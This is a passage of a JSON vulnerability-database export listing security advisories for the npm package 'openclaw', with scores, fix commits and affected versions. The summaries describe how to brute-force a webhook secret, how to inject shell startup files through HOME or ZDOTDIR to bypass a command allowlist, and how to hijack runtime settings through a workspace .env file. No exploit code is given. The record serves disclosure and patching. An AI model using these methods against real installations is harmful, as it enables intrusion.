},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-43580","GHSA-536q-mj95-h29h"],"risk_score":3.5,"exploitability":"0.5","weighted_severity":"6.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pae5-uyu7-k3c1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91337?format=json","vulnerability_id":"VCID-pc9z-x5wk-8ue7","summary":"OpenClaw's Nextcloud Talk webhook missing rate limiting on shared secret authentication\n## Summary\n\nNextcloud Talk webhook signature failures were not throttled even though the integration relies on an operator-configured shared secret that may be weak.\n\n## Impact\n\nAn attacker who could reach the webhook endpoint could brute-force weak secrets online and then forge inbound webhook events.\n\n## Affected Component\n\n`extensions/nextcloud-talk/src/monitor.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `e403decb6e` (`nextcloud-talk: throttle repeated webhook auth failures`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33580","reference_id":"","reference_type":"","scores":[{"value":"0.00064","scoring_system":"epss","scoring_elements":"0.19981","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00082","scoring_system":"epss","scoring_elements":"0.24086","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00082","scoring_system":"epss","scoring_elements":"0.24069","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33580"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-31T17:18:43Z/"}],"url":"https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.28"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9528-x887-j2fp","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-31T17:18:43Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9528-x887-j2fp"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33580","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33580"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-rate-limiting-on-webhook-shared-secret-authentication","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-31T17:18:43Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-rate-limiting-on-webhook-shared-secret-authentication"},{"reference_url":"https://github.com/advisories/GHSA-9528-x887-j2fp","reference_id":"GHSA-9528-x887-j2fp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9528-x887-j2fp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-33580","GHSA-9528-x887-j2fp"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pc9z-x5wk-8ue7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91630?format=json","vulnerability_id":"VCID-pdgz-5fu2-g7af","summary":"Duplicate Advisory: OpenClaw's shell startup env injection bypasses system.run allowlist intent (RCE class)\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-xgf2-vxv2-rrmg. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.22 fail to sanitize shell startup environment variables HOME and ZDOTDIR in the system.run function, allowing attackers to bypass command allowlist protections. Remote attackers can inject malicious startup files such as .bash_profile or .zshenv to achieve arbitrary code execution before allowlist-evaluated commands are executed.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/c2c7114ed39a547ab6276e1e933029b9530ee906","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/c2c7114ed39a547ab6276e1e933029b9530ee906"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-remote-code-execution-via-shell-startup-environment-variable-injection-in-system-run","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-remote-code-execution-via-shell-startup-environment-variable-injection-in-system-run"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32056","reference_id":"CVE-2026-32056","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32056"},{"reference_url":"https://github.com/advisories/GHSA-rj39-33v7-9xrq","reference_id":"GHSA-rj39-33v7-9xrq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rj39-33v7-9xrq"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xgf2-vxv2-rrmg","reference_id":"GHSA-xgf2-vxv2-rrmg","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xgf2-vxv2-rrmg"}],"fixed_packages":[],"aliases":["GHSA-rj39-33v7-9xrq"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pdgz-5fu2-g7af"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89369?format=json","vulnerability_id":"VCID-pdmd-a4fg-8fcg","summary":"OpenClaw: Workspace .env could inject OpenClaw runtime-control variables\n## Summary\n\nWorkspace .env could inject OpenClaw runtime-control variables.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.9`\n- Patched versions: `>= 2026.4.9`\n\n## Impact\n\nA malicious workspace `.env` file could set OpenClaw runtime-control variables affecting update sources, gateway URLs, ClawHub resolution, browser executable paths, and related behavior.\n\n## Technical Details\n\nThe fix blocks OpenClaw runtime-control keys and key families from workspace `.env` loading.\n\n## Fix\n\nThe issue was fixed in #62660. The first stable tag containing the fix is `v2026.4.9`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `dbfcef319618158fa40b31cdac386ea34c392c0c`\n- PR: #62660\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.9 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43531","reference_id":"","reference_type":"","scores":[{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.0832","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09649","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09673","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43531"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/dbfcef319618158fa40b31cdac386ea34c392c0c","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T13:49:24Z/"}],"url":"https://github.com/openclaw/openclaw/commit/dbfcef319618158fa40b31cdac386ea34c392c0c"},{"reference_url":"https://github.com/openclaw/openclaw/pull/62660","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/62660"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7wv4-cc7p-jhxc","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T13:49:24Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7wv4-cc7p-jhxc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43531","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43531"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-workspace-env-file","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T13:49:24Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-workspace-env-file"},{"reference_url":"https://github.com/advisories/GHSA-7wv4-cc7p-jhxc","reference_id":"GHSA-7wv4-cc7p-jhxc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7wv4-cc7p-jhxc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110121?format=json","purl":"pkg:npm/openclaw@2026.4.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-k8x3-9pv7-rfax"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rvcq-rqbq-4khp"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.9"}],"aliases":["CVE-2026-43531","GHSA-7wv4-cc7p-jhxc"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"7.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pdmd-a4fg-8fcg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91444?format=json","vulnerability_id":"VCID-pgdr-mvc3-2kg3","summary":"OpenClaw's mutating internal ACP chat commands missed operator.admin scope enforcement\n## Summary\nMutating 